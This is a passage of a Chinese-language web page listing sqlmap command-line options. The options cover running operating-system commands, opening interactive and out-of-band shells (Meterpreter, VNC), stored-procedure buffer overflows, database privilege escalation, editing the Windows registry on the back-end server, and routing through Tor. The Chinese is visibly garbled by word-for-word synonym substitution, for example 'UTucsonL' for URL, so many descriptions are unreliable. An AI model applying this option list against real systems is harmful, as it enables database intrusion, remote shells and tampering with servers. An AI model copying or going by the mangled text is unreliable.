–os-cmd=OSCMD 执行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取多少个OOB shell,meterpreter或VNC

–os-smbrelay 一键获取贰个OOB shell,meterpreter或VNC

–os-bof 存款和储蓄进度缓冲区溢出利用

–priv-esc 数据库进度用户权限进步

–msf-path=MSFPATH Metasploit Framework本地的装置路线

–tmp-path=TMPPATH 远程一时半刻文件目录的相对路径

Windows注册表访问:

那一个选拔能够被用来访问后端数据库管理类别Windows注册表。

–reg-read 读多少个Windows注册表项值

–reg-add 写二个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA Windows注册表键值多少

–reg-type=REGTYPE Windows注册表项值类型

那几个选择能够用来设置有个别一般的职业参数。

-t TRAFFICFILE 记录全体HTTP流量到二个文本文件中

-s SESSIONFILE 保存和还原检索会话文件的富有数据

–flush-session 刷新当前目标的对话文件

–fresh-queries 忽略在对话文件中存款和储蓄的查询结果

–eta 呈现种种输出的推测到达时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch 从不询问用户输入,使用全部默许配置。

Miscellaneous(杂项):

–beep 开采SQL注入时提醒

–check-payload IDS对流入payloads的检查测试测试

–cleanup SqlMap具体的UDF和表清理DBMS

–forms 对目标UTucsonL的解析和测试格局

–gpage=GOOGLEPAGE 从钦定的页码使用谷歌(Google)dork结果

–page-rank 谷歌(Google) dork结果呈现网页名次(PHummerH贰)

–parse-errors 从响应页面解析数据库管理种类的谬误音信

–replicate 复制转储的数量到2个sqlite3数据库

–tor 使用私下认可的Tor(比达尔ia/ Privoxy/ Polipo)代理地址

–wizard 给初级用户的简短向导分界面

相关文章

No Comments, Be The First!
近期评论
    功能
    网站地图xml地图